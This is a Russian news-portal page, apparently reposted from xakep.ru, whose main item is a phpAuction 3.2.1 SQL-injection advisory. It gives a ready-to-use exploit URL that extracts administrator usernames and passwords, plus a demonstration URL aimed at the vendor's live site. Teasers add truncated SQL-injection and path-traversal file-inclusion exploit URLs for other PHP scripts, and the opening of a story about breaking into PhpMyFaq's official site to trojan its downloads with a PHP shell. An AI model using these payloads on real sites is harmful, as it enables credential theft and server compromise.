Наши материалы
Системы безопасности связи
Парковка
Рынок страхования

Бизнес-новости

Инвестиции

Валютные операции

Электронная коммерция

Реклама

Промышленность

Рейтинги и Опросы

Пресс-релизы

Транспортный сервер

Бухгалтерские заметки

Успешный бизнес

Обзор рынков

Разнообразие мира связи


Темы статей
Сельхозпроизводство



Платный хостинг от провайдера HostSpace.com.ua - хостинг, регистрация доменов. Поддержка PHP, MySQL, почта - в каждом тарифном плане.

SQL-инъекция в phpAuction

Программа: phpAuction 3.2.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием item.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:








http://www.site.net/[Pats]/item.php?id=-1+%75%6E%69%6F%6E+select+1,2, concat_ws(0x3a,username,password),4,5,6,7,8,9, 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32+%66%72%6F%6D+PHPAUCTIONXL_adminusers--

Демонстрация:

http://www.phpauction.net/phpauction-gpl-3.2/item.php?id=-1+%75%6E%69%6F%6E+ select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32+%66%72%6F%6D+PHPAUCTIONXL_adminusers--



www.xakep.ru

Системы безопасности связи 23-06-2008
sql-инъекция в diesel pay sсriрt 22-09-2008 Системы безопасности связи
Программа: Diesel Pay ScriptУязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «area» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.Эксплоит:http://localhost/script_path/index.php?a=browse&...


Троянский конь в PhpMyFaq: история протроянивания популярного движка 20-09-2008 Системы безопасности связи
Как-то раз я наткнулся в Гугле на сайтhttp://phpmyfaq.de. Это официальная страница движка для создания факов – PhpMyFaq (по аналогии со скриптом менеджера БД PhpMyAdmin). Заинтересовавшись, я решил проверить распространенность движка в инете. По запросу «phpmyfaq» поисковик выдал 828 000 результатов! И тут мне пришла безумная идея: что, если взломать официальный сайт движка, а затем протроянить архивы с PhpMyFaq своим php-шеллом?Пои...


PHP-инклюдинг в D-iscussion Board 15-09-2008 Системы безопасности связи
Программа: D-iscussion Board 3.01Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «topic» сценарием index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.Эксплоит:http://127.0.0.1/3.01/general/index.php?topic=../../../../autoexec.bat%00...


Пентагон поставит на самолеты Linux 15-09-2008 Системы безопасности связи
Американское военное ведомство планирует в скором времени осуществить массовую смену операционных систем в бортовых компьютерах боевых самолетов и вертолетов. Коммерческие продукты по всем параметрам не удовлетворили генералов.Вместо продуктов с закрытым исходным кодом, вроде Windows, американское военное ведомство может начать использовать программное обеспечение с открытым исходным кодом (Linux) в пилотируемых и беспилотных летательны...
 
 
Copyright by www.quote.com.ua.
Цитирование материалов допускается при наличии ссылки на www.quote.com.ua.
Rambler's Top100 Рейтинг@Mail.ru